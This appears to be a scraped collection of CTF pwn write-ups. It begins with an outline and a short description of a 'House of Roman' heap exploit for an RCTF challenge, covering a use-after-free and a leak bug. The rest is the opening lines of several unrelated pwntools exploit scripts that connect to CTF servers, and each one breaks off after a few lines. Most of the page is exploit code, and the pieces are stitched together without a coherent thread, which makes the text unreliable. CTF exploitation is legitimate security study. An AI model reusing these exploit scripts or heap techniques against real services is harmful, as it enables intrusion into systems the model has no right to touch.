- Disclaimer
- House Of Roman
------> 2.1 Assumptions
------> 2.2 Protections
------> 2.3 Quick Walkthrough
------> 2.4 Setting the FD to malloc_hook
------> 2.5 Fixing the 0x71 freelist
------> 2.6 Unsorted Bin attack on malloc_hook
Challenge from RCTF, the pre-qualifiers for XCTF.
There are two bugs in the program: the first is an obvious use-after-free (UAF). The second is that the input is not NULL-terminated immediately after our data, which allows a leak: the NULL byte is written at buf + size - 1, and the read loop breaks as soon as a byte equals "\n".
However, leaking is tricky since the program uses calloc, which zeroes the newly allocated heap chunk.
#!/usr/bin/python
from pwn import *
# Bit-rotation helpers over a max_bits-wide value: rol1 rotates left,
# ror1 rotates right, masking the result to max_bits bits.
rol1 = lambda val, r_bits, max_bits: \
    (val << r_bits%max_bits) & (2**max_bits-1) | \
    ((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))
ror1 = lambda val, r_bits, max_bits: \
    ((val & (2**max_bits-1)) >> r_bits%max_bits) | \
    (val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
#!/usr/bin/python
from pwn import *
elf = ELF("./libc-2.23.so")
#r = remote("http://sapeloshop.teaser.insomnihack.ch",80)
r = remote('sapeloshop.teaser.insomnihack.ch', 80)
#r = process("./sapeloshop",env={"LD_PRELOAD":"./libc-2.23.so"})
raw_input()
i = int("3d714", 16)
#!/usr/bin/python
from pwn import *
elf = ELF("./libc-2.23.so")
p = remote("159.203.116.12", 8888)
#p = process("./memo",env={"LD_PRELOAD":"./libc-2.23.so"})
raw_input()
def menu():
    p.recvuntil(">")
#!/usr/bin/python
from pwn import *
p = remote("secure_keymanager.pwn.seccon.jp",47225)
#p = process("./secure_keymanager",env={"LD_PRELOAD" : "./libc-2.23.so"})
raw_input()
def menu():
    p.recvuntil(">>")
#!/usr/bin/python
from pwn import *
p = remote("35.198.130.245", 1337)
#p = process("./readme_revenge")
raw_input()
#name = "A"*920
name = p64(0x00) # Pass NULL Check.
name += "XXXX"